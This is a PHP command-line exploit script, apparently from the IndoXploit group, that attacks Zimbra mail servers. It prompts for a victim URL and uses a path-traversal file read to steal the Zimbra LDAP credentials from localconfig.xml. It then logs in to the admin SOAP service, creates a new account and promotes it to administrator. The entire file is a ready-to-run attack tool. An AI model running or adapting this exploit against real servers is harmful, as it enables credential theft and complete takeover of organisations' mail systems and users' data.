Zimbra Exploit PHP CLI Model

#!/usr/local/bin/php
<?php
// Created by Tu5b0l3d - IndoXploit
// big thx to: duardo Rubina H.
// http://indoxploit.blogspot.co.id/2015/12/auto-exploiter-zimbra-php.html
// Cuman di-recode dikit om ama fyelix

error_reporting(0);
fwrite(STDOUT, "Masukin url nya tong :");
$url = filter_var(fgets(STDIN), FILTER_SANITIZE_URL);
if(isset($url) && !filter_var($url, FILTER_VALIDATE_URL) === FALSE){
fwrite(STDOUT, "Masukin nama user barunya tong :");
}else{
echo "Invalid URL ! Please use ex: http://victimurl.com\n";
exit(0);
}
$newuser = trim(fgets(STDIN));
if(isset($url) && isset($newuser) && strlen($newuser) > 5){
fwrite(STDOUT, "Masukin password user barunya tong :");
}else{
echo "Minimal ga kurang lima tong biar nyaman < 5\n";
exit(0);
}
$newpass = trim(fgets(STDIN));
if(isset($url) && isset($newuser) && isset($newpass) && strlen($newpass) > 5){
checknow($url,$newuser,$newpass);
}else{
echo "Ada masalah tong pas mau exploit nya :v\n";
exit(0);
}
function ngecek($url,$post){
                    $ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$data2 = curl_exec ($ch);
return $data2;
}

function nganu_body($toket,$req){
$body = "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra\"><authToken>$toket</authToken></context></soap:Header><soap:Body>$req</soap:Body></soap:Envelope>";
return $body;
}
function checknow($target,$newuser,$newpass){
        if($target==""){
            echo "\nPlease input victim site !!\n\n";
            exit();
        }
        else{
        $user_baru = $newuser;
        $pwd_baru = $newpass;
        $lfi = "res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00";
        $link_lfi = "$target/$lfi";
        echo "# $target\n";
                   $ch2 = curl_init ("$link_lfi");
                   curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
                   curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
                   curl_setopt ($ch2, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
                   curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
                   curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
                   curl_setopt ($ch2, CURLOPT_ENCODING, "gzip");
                   curl_setopt($ch2, CURLOPT_COOKIEJAR,'coker_log');
                   curl_setopt($ch2, CURLOPT_COOKIEFILE,'coker_log');
                    $ambil = curl_exec ($ch2);

                    $get_user = explode('<key"]="name=\"zimbra_user\">', $ambil);
                    preg_match('/a\["<value>(.*?)<\/value>/', $get_user[1], $user);

                    $get_pwd = explode('<key"]="name=\"zimbra_ldap_password\">', $ambil);
                    preg_match('/a\["<value>(.*?)<\/value>/', $get_pwd[1], $pwd);
                   if($user[1] or $pwd[1] != ""){
                    echo "# Pulen nih...\n";

                    $body = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
                    <env:Envelope xmlns:env=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:ns1=\"urn:zimbraAdmin\" xmlns:ns2=\"urn:zimbraAdmin\"><env:Header><ns2:context/></env:Header><env:Body><ns1:AuthRequest><account by=\"name\">$user[1]</account><password>$pwd[1]</password></ns1:AuthRequest></env:Body></env:Envelope>";

                    $link = "https://$target:7071/service/admin/soap";
                    $token = ngecek($link,$body);

                preg_match('/<authToken>(.*)<\/authToken>/', $token, $toket);

                    if($toket[1]==""){
                        echo "# gagal ngambil toket\n\n";
                        break;
                    }
                    else{

                        echo "# $toket[1]\n";
                    $req = @("<GetAllDomainsRequest xmlns=\"urn:zimbraAdmin\"></GetAllDomainsRequest>");
                    $body2 = nganu_body($toket[1],$req);

                    $liat = ngecek($link,$body2);
                    preg_match('/<a n=\"zimbraDomainName\">(.*?)<\/a>/', $liat, $domain);
                    echo "# Creating Account...\n";
                    $req2 = "<CreateAccountRequest xmlns=\"urn:zimbraAdmin\"><name>$user_baru@$domain[1]</name><password>$pwd_baru</password></CreateAccountRequest>";
                    $body3 = nganu_body($toket[1],$req2);

                    $liat2 = ngecek($link,$body3);

                    preg_match('/account id="(.*)" name="/', $liat2, $new);
                    $req3 = "<ModifyAccountRequest xmlns=\"urn:zimbraAdmin\"><id>$new[1]</id><a n=\"zimbraIsAdminAccount\">TRUE</a></ModifyAccountRequest>";
                    $body4 = nganu_body($toket[1],$req3);

                    $liat3 = ngecek($link,$body4);


                    echo "# Sukses\n";
                    echo "# Login Url: https://$target:7071/zimbraAdmin/\n# Account: $user_baru@$domain[1]\n# Password: $pwd_baru\n\n";


                   }
               }
                   else{
                    echo "# Not Vuln Site\n";
                   }
               }
}
?>